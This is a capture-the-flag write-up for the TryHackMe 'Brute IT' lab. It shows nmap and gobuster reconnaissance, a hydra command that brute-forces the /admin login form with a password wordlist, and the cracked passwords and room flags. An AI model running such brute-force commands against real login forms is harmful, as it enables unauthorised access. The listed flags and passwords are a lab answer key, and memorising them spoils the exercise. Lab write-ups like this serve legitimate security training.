Brute IT - TryHackMe
Learn how to brute, hash cracking and escalate privileges in this box!
Brute IT - TryHackMe
| [TryHackMe | Brute IT](https://tryhackme.com/room/bruteit) |
In this box you will learn about:
- Brute-force
- Hash cracking
- Privilege escalation
Before attacking, let’s get information about the target
Search for open ports using nmap, how many ports are open?
1
Desktop/TryHackMe/brut_it » nmap -A -vv 10.10.93.226 -oN nmap_result
1
2 ports are open.
What version of SSH is running?
1
OpenSSH 7.6p1
What version of Apache is running?
1
2.4.29
Which Linux distribution is running?
1
ubuntu
Search for hidden directories on web server, what is the hidden directory?
1
Desktop/TryHackMe/brut_it » gobuster -u 10.10.93.226 -w /opt/directory-list-2.3-medium.txt
1
2
# Hidden directory
/admin
Find a form to get a shell on SSH.
What is the user:password of the admin panel?
As you can see, there is the user and password in the form data, we can use this to brute-force the login with hydra.
Hidden message
1
2
# Hydra command (Pretty straightforward)
hydra -l admin -P /opt/rockyou.txt 10.10.93.226 http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:Username or password invalid"
1
2
# Credentials
admin:xavier
Crack the RSA key you found, what is John’s RSA Private Key passphrase?
1
2
# Password for the private key is
rockinroll
user.txt
1
THM{a_password_is_not_a_barrier}
Web flag
1
THM{brut3_f0rce_is_e4sy}
Find a form to escalate your privileges, what is the root’s password?
1
2
# Password for the root user
football
Root.txt
1
THM{pr1v1l3g3_3sc4l4t10n}
This post is licensed under
CC BY 4.0
by the author.